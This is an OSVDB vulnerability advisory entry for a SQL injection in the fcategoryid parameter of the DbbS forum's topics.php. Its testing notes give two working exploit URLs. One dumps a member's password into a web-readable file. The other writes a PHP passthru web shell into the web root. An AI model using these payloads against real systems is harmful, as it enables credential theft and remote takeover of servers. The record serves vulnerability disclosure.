DbbS topics.php fcategoryid Variable SQL Injection

2006-04-16T03:03:42
ID OSVDB:24957
Type osvdb
Reporter OSVDB
Modified 2006-04-16T03:03:42

Description

Manual Testing Notes

http://[target]/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\inetpub\wwwroot\dbbs\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/ http://[target]/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\inetpub\wwwroot\dbbs\suntzu.php'%20FROM%20forum_categories/

References:

Vendor URL: http://www.dbbs.sup.fr/ Related OSVDB ID: 24956 Related OSVDB ID: 24958 Related OSVDB ID: 24955 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0327.html CVE-2006-1915